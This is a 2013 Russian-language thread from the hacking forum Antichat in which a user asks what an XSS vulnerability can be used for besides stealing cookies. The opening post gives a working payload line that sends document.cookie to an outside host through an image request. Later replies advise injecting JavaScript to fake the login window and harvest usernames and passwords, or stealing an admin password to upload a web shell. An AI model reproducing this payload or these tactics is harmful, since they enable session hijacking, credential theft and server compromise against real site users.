ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Что можно сделать с XSS кроме как украсть cookie? (https://forum.antichat.xyz/showthread.php?t=395565)

panfilov1991 01.10.2013 22:39

Есть пассивная XSS, работает только с этим кодом:

Код:


img = new Image(); img.src = "http://httpz.ru/n4zjm6erzao.gif?"+document.cookie;

За кражу cookie отвечает +document.cookie;

А что можно еще сделать с XSS?

Можно ли загнать на сервер какого нибудь червя?

Inoms 01.10.2013 23:13

Цитата:

Сообщение от panfilov1991
Можно ли загнать на сервер какого нибудь червя?

Нельзя. Такое в редких случаях можно проделать только с активами и то код будет работать только на тех страницах, где он будет вшит.

panfilov1991 01.10.2013 23:22

Цитата:

Сообщение от Inoms
Нельзя. Такое в редких случаях можно проделать только с активами и то код будет работать только на тех страницах, где он будет вшит.

Есть на примере активная XSS.

Где взять код который можно попробовать вшить?

Inoms 01.10.2013 23:36

Цитата:

Сообщение от panfilov1991
Есть на примере активная XSS.
Где взять код который можно попробовать вшить?

Подразумевается html\js сценарий, можно любой кинуть, или проинклудить js.

panfilov1991 01.10.2013 23:51

Цитата:

Сообщение от Inoms
Подразумевается html\js сценарий, можно любой кинуть, или проинклудить js.

То что код можно вшить любой я понял, как это сделать я не понимаю!

подскажите пожалуйста!

Inoms 02.10.2013 00:14

Цитата:

Сообщение от panfilov1991
То что код можно вшить любой я понял, как это сделать я не понимаю!
подскажите пожалуйста!

Так-же, как вы выполняете код сниффера, только вместо него, требуемый код. А проинклудить js можно так: "", через него можно выполнять и html (document.write и т.д). То, что вы "вошьёте" через пассиву, будет существовать только конкретно для вас, т.е не запишется на страницу статически, а только после отправки запроса на уязвимый параметр.

M_script 02.10.2013 00:16

Цитата:

Сообщение от panfilov1991
как это сделать я не понимаю!

Выучить JS самому или заказать у кого-нибудь написание кода за деньги.

upd:

Пример того, что можно делать с пассивкой - /thread275417.html

Enesey 10.10.2013 17:18

Что мешает с помощью XSS украсть пароль админа и там уже дальше залить шелл или что тебе там нужно?

sl1k 10.10.2013 18:28

сделай js файл который подменит окно авторизации,

черз свою xss подгрузи этот файл, и логины:пароли у тебя в кармане, если повезет может и админа подловишь


Время: 09:58